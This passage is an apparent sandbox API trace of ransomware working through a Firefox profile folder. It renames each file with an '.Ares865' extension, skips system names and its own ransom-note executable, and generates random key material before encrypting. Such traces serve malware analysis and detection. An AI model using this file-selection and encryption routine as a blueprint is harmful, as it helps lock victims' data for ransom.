data\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini.ares865"), dwFlags=0x1) returned 1 [0108.145] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.145] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=141) returned 1 [0108.145] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.146] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.146] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.148] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.149] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.149] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.149] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf.Ares865") returned 111 [0108.150] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf.ares865"), dwFlags=0x1) returned 1 [0108.151] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.151] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1281) returned 1 [0108.152] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.152] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.152] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.154] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.155] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.155] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.156] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log.Ares865") returned 111 [0108.156] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log.ares865"), dwFlags=0x1) returned 1 [0108.157] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.158] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=57) returned 1 [0108.158] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.158] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.158] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.163] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.164] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.164] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.165] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf.Ares865") returned 110 [0108.165] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf.ares865"), dwFlags=0x1) returned 1 [0108.166] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.166] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3827) returned 1 [0108.167] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.167] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.167] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.181] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.184] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.184] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.185] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock.Ares865") returned 108 [0108.185] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\parent.lock"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\parent.lock.ares865"), dwFlags=0x1) returned 1 [0108.190] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\parent.lock.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.191] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0108.191] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0108.191] CloseHandle (hObject=0x0) returned 0 [0108.191] CloseHandle (hObject=0x118) returned 1 [0108.191] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb43eb830, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb43eb830, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x5029c8a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x10300, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="permissions.sqlite.Ares865", cAlternateFileName="PERMIS~1.ARE")) returned 1 [0108.191] lstrcmpiW (lpString1="permissions.sqlite.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0108.191] lstrcmpiW (lpString1="permissions.sqlite.Ares865", lpString2="aoldtz.exe") returned 1 [0108.191] lstrcmpiW (lpString1="permissions.sqlite.Ares865", lpString2=".") returned 1 [0108.191] lstrcmpiW (lpString1="permissions.sqlite.Ares865", lpString2="..") returned 1 [0108.191] lstrcmpiW (lpString1="permissions.sqlite.Ares865", lpString2="windows") returned -1 [0108.191] lstrcmpiW (lpString1="permissions.sqlite.Ares865", lpString2="bootmgr") returned 1 [0108.191] lstrcmpiW (lpString1="permissions.sqlite.Ares865", lpString2="temp") returned -1 [0108.191] lstrcmpiW (lpString1="permissions.sqlite.Ares865", lpString2="pagefile.sys") returned 1 [0108.191] lstrcmpiW (lpString1="permissions.sqlite.Ares865", lpString2="boot") returned 1 [0108.191] lstrcmpiW (lpString1="permissions.sqlite.Ares865", lpString2="ids.txt") returned 1 [0108.191] lstrcmpiW (lpString1="permissions.sqlite.Ares865", lpString2="ntuser.dat") returned 1 [0108.191] lstrcmpiW (lpString1="permissions.sqlite.Ares865", lpString2="perflogs") returned 1 [0108.191] lstrcmpiW (lpString1="permissions.sqlite.Ares865", lpString2="MSBuild") returned 1 [0108.192] lstrlenW (lpString="permissions.sqlite.Ares865") returned 26 [0108.192] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock") returned 100 [0108.192] lstrcpyW (in: lpString1=0x2cce4b2, lpString2="permissions.sqlite.Ares865" | out: lpString1="permissions.sqlite.Ares865") returned="permissions.sqlite.Ares865" [0108.192] lstrlenW (lpString="permissions.sqlite.Ares865") returned 26 [0108.192] lstrlenW (lpString="Ares865") returned 7 [0108.192] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0108.192] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4c1a3d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb4c1a3d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x502c2a00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xa00300, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="places.sqlite.Ares865", cAlternateFileName="PLACES~1.ARE")) returned 1 [0108.192] lstrcmpiW (lpString1="places.sqlite.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0108.192] lstrcmpiW (lpString1="places.sqlite.Ares865", lpString2="aoldtz.exe") returned 1 [0108.192] lstrcmpiW (lpString1="places.sqlite.Ares865", lpString2=".") returned 1 [0108.192] lstrcmpiW (lpString1="places.sqlite.Ares865", lpString2="..") returned 1 [0108.192] lstrcmpiW (lpString1="places.sqlite.Ares865", lpString2="windows") returned -1 [0108.192] lstrcmpiW (lpString1="places.sqlite.Ares865", lpString2="bootmgr") returned 1 [0108.192] lstrcmpiW (lpString1="places.sqlite.Ares865", lpString2="temp") returned -1 [0108.192] lstrcmpiW (lpString1="places.sqlite.Ares865", lpString2="pagefile.sys") returned 1 [0108.192] lstrcmpiW (lpString1="places.sqlite.Ares865", lpString2="boot") returned 1 [0108.192] lstrcmpiW (lpString1="places.sqlite.Ares865", lpString2="ids.txt") returned 1 [0108.192] lstrcmpiW (lpString1="places.sqlite.Ares865", lpString2="ntuser.dat") returned 1 [0108.192] lstrcmpiW (lpString1="places.sqlite.Ares865", lpString2="perflogs") returned 1 [0108.192] lstrcmpiW (lpString1="places.sqlite.Ares865", lpString2="MSBuild") returned 1 [0108.192] lstrlenW (lpString="places.sqlite.Ares865") returned 21 [0108.192] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite.Ares865") returned 115 [0108.192] lstrcpyW (in: lpString1=0x2cce4b2, lpString2="places.sqlite.Ares865" | out: lpString1="places.sqlite.Ares865") returned="places.sqlite.Ares865" [0108.192] lstrlenW (lpString="places.sqlite.Ares865") returned 21 [0108.192] lstrlenW (lpString="Ares865") returned 7 [0108.192] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0108.192] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x81fbde30, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x81fbde30, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x81fbde30, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xe14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pluginreg.dat", cAlternateFileName="PLUGIN~1.DAT")) returned 1 [0108.192] lstrcmpiW (lpString1="pluginreg.dat", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0108.192] lstrcmpiW (lpString1="pluginreg.dat", lpString2="aoldtz.exe") returned 1 [0108.192] lstrcmpiW (lpString1="pluginreg.dat", lpString2=".") returned 1 [0108.192] lstrcmpiW (lpString1="pluginreg.dat", lpString2="..") returned 1 [0108.192] lstrcmpiW (lpString1="pluginreg.dat", lpString2="windows") returned -1 [0108.192] lstrcmpiW (lpString1="pluginreg.dat", lpString2="bootmgr") returned 1 [0108.193] lstrcmpiW (lpString1="pluginreg.dat", lpString2="temp") returned -1 [0108.193] lstrcmpiW (lpString1="pluginreg.dat", lpString2="pagefile.sys") returned 1 [0108.193] lstrcmpiW (lpString1="pluginreg.dat", lpString2="boot") returned 1 [0108.193] lstrcmpiW (lpString1="pluginreg.dat", lpString2="ids.txt") returned 1 [0108.193] lstrcmpiW (lpString1="pluginreg.dat", lpString2="ntuser.dat") returned 1 [0108.193] lstrcmpiW (lpString1="pluginreg.dat", lpString2="perflogs") returned 1 [0108.193] lstrcmpiW (lpString1="pluginreg.dat", lpString2="MSBuild") returned 1 [0108.193] lstrlenW (lpString="pluginreg.dat") returned 13 [0108.193] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite.Ares865") returned 110 [0108.193] lstrcpyW (in: lpString1=0x2cce4b2, lpString2="pluginreg.dat" | out: lpString1="pluginreg.dat") returned="pluginreg.dat" [0108.193] lstrlenW (lpString="pluginreg.dat") returned 13 [0108.193] lstrlenW (lpString="Ares865") returned 7 [0108.193] lstrcmpiW (lpString1="reg.dat", lpString2="Ares865") returned 1 [0108.193] lstrlenW (lpString=".dll") returned 4 [0108.193] lstrcmpiW (lpString1="pluginreg.dat", lpString2=".dll") returned 1 [0108.193] lstrlenW (lpString=".lnk") returned 4 [0108.193] lstrcmpiW (lpString1="pluginreg.dat", lpString2=".lnk") returned 1 [0108.193] lstrlenW (lpString=".ini") returned 4 [0108.193] lstrcmpiW (lpString1="pluginreg.dat", lpString2=".ini") returned 1 [0108.193] lstrlenW (lpString=".sys") returned 4 [0108.193] lstrcmpiW (lpString1="pluginreg.dat", lpString2=".sys") returned 1 [0108.193] lstrlenW (lpString="pluginreg.dat") returned 13 [0108.193] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat.Ares865") returned 110 [0108.193] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat.ares865"), dwFlags=0x1) returned 1 [0108.195] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.195] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3604) returned 1 [0108.196] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.196] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.196] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.201] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.201] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.202] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.202] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js.Ares865") returned 105 [0108.202] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js.ares865"), dwFlags=0x1) returned 1 [0108.204] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.205] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4062) returned 1 [0108.205] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.206] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.206] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.208] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.209] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.209] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.209] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json.Ares865") returned 108 [0108.209] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json.ares865"), dwFlags=0x1) returned 1 [0108.211] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.211] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16771) returned 1 [0108.212] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.212] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.212] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.215] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.216] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.216] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.217] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js.Ares865") returned 112 [0108.217] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js.ares865"), dwFlags=0x1) returned 1 [0108.218] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.219] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3013) returned 1 [0108.219] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.220] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.220] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.222] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.223] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.223] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.223] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json.Ares865") returned 107 [0108.223] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json.ares865"), dwFlags=0x1) returned 1 [0108.225] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, 